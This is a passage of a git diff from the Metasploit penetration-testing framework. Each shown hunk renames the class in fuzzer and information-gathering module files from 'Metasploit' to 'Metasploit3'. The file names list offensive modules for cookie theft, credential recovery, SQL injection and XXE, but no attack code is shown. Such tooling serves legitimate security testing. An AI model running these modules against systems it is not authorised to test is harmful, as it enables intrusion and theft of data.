b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 31529a3c39..658ecdee4a 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 83b25f4d49..9074760d1c 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index e3a084fc63..611c33d0ca 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index 3a41b9357d..f0b00f0fe1 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index 4018d3ba0a..f87821d32b 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index 57616bb9be..c8edc3c0ed 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index 99567349cd..bebf1f081f 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 266d7bf36a..887dcea57d 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 31dc8df62b..17a4f0336b 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index 99c7a12eec..eb9574bbff 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index 3e67b970be..af2359c05b 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb index 15431a3515..98d347f89d 100644 --- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb +++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb index 3cd7d3cf8a..4c37acb610 100644 --- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb +++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index 538299f505..b185233021 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index 99838cffd9..ade049c58b 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 80ef84d00d..8160691034 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index ca97619e74..bfaf631e24 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index 1229a89c52..e6ca939df3 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index c021547369..cf83fbecc9 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index e8277350f8..de42cb7159 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 22d1718e5c..c87615aa62 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 4b36a9f1c8..3b4794fa3f 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/dns/resolver' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index 78f1563b45..0834c5c16e 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 83f87892bc..4726b53de9 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb index de83c0ea74..31866fb56a 100644 --- a/modules/auxiliary/gather/dns_srv_enum.rb +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index 89db08731c..0967baf944 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index 1135430e17..6110eb4ed8 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index e30e47d286..0fe0e0039c 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index b471168ad8..6310586fc2 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 80ed6a3987..7c19308176 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/eventlog_cred_disclosure.rb b/modules/auxiliary/gather/eventlog_cred_disclosure.rb index 4315b3bc2c..6d58c3b95b 100644 --- a/modules/auxiliary/gather/eventlog_cred_disclosure.rb +++ b/modules/auxiliary/gather/eventlog_cred_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/external_ip.rb b/modules/auxiliary/gather/external_ip.rb index 6fab317599..5eb3919f80 100644 --- a/modules/auxiliary/gather/external_ip.rb +++ b/modules/auxiliary/gather/external_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 666959417f..e7b7b72f02 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb index 1c64e7bc92..80e049155d 100644 --- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb +++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb index f9ec82aac5..9e5643d353 100644 --- a/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb +++ b/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_enum_perfd.rb b/modules/auxiliary/gather/hp_enum_perfd.rb index 370246f3b4..1a51760858 100644 --- a/modules/auxiliary/gather/hp_enum_perfd.rb +++ b/modules/auxiliary/gather/hp_enum_perfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/hp_snac_domain_creds.rb b/modules/auxiliary/gather/hp_snac_domain_creds.rb index 8061759f9f..ad4b1c1cd2 100644 --- a/modules/auxiliary/gather/hp_snac_domain_creds.rb +++ b/modules/auxiliary/gather/hp_snac_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/huawei_wifi_info.rb b/modules/auxiliary/gather/huawei_wifi_info.rb index 559ed1a179..83e648b066 100644 --- a/modules/auxiliary/gather/huawei_wifi_info.rb +++ b/modules/auxiliary/gather/huawei_wifi_info.rb @@ -6,7 +6,7 @@ require 'base64' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index 81e3cea8b8..20b3d6911b 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index e359ae331d..07cf026d44 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'enumerable' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index 22bf5815ed..d9ea98a4e6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ie_uxss_injection.rb b/modules/auxiliary/gather/ie_uxss_injection.rb index 1ca1c64c9b..f270a2eba2 100644 --- a/modules/auxiliary/gather/ie_uxss_injection.rb +++ b/modules/auxiliary/gather/ie_uxss_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/gather/java_rmi_registry.rb b/modules/auxiliary/gather/java_rmi_registry.rb index 3db58c6bc0..b16a028b08 100644 --- a/modules/auxiliary/gather/java_rmi_registry.rb +++ b/modules/auxiliary/gather/java_rmi_registry.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/auxiliary/gather/jenkins_cred_recovery.rb b/modules/auxiliary/gather/jenkins_cred_recovery.rb index 08dfa3c9f6..3c7ed07bb3 100644 --- a/modules/auxiliary/gather/jenkins_cred_recovery.rb +++ b/modules/auxiliary/gather/jenkins_cred_recovery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/joomla_weblinks_sqli.rb b/modules/auxiliary/gather/joomla_weblinks_sqli.rb index 30a22110ab..06bb238dd1 100644 --- a/modules/auxiliary/gather/joomla_weblinks_sqli.rb +++ b/modules/auxiliary/gather/joomla_weblinks_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 595a47ce26..27092ab4f4 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb +++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb index 63f28e3004..484c796beb 100644 --- a/modules/auxiliary/gather/lansweeper_collector.rb +++ b/modules/auxiliary/gather/lansweeper_collector.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/mcafee_epo_xxe.rb b/modules/auxiliary/gather/mcafee_epo_xxe.rb index 5150c5a4cb..4d3803f39a 100644 --- a/modules/auxiliary/gather/mcafee_epo_xxe.rb +++ b/modules/auxiliary/gather/mcafee_epo_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index d3025306f9..72df26dd36 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/ms14_052_xmldom.rb b/modules/auxiliary/gather/ms14_052_xmldom.rb index cb33c29861..763be66084 100644 --- a/modules/auxiliary/gather/ms14_052_xmldom.rb +++ b/modules/auxiliary/gather/ms14_052_xmldom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 8971d710af..394b1facdf 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index 29661effd1..fe78628201 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index 0d57bcfbbf..bd2c72c701 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Exploit::Format::Webarchive diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 467a13265a..70e60de0ec 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/http' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/solarwinds_orion_sqli.rb b/modules/auxiliary/gather/solarwinds_orion_sqli.rb index 65de8a4606..50ea93d350 100644 --- a/modules/auxiliary/gather/solarwinds_orion_sqli.rb +++ b/modules/auxiliary/gather/solarwinds_orion_sqli.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 5c714d8e06..316dd0886a 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -8,7 +8,7 @@ require 'active_support/inflector' require 'json' require 'active_support/core_ext/hash' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary class InvocationError < StandardError; end class RequestRateTooHigh < StandardError; end class InternalError < StandardError; end diff --git a/modules/auxiliary/gather/trackit_sql_domain_creds.rb b/modules/auxiliary/gather/trackit_sql_domain_creds.rb index 9e9b070b34..68b1c93e02 100644 --- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb +++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index 7c50c769e5..d7de619453 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index 8dc2670f47..c88ab1fc3f 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/dcerpc' require 'rex/parser/unattend' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index 1d42a9d7d9..f3aed3ef04 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index 105e82c1f2..d302309b70 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 14a98b593e..2dcc988ec3 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -5,7 +5,7 @@ require 'msf/core' -class 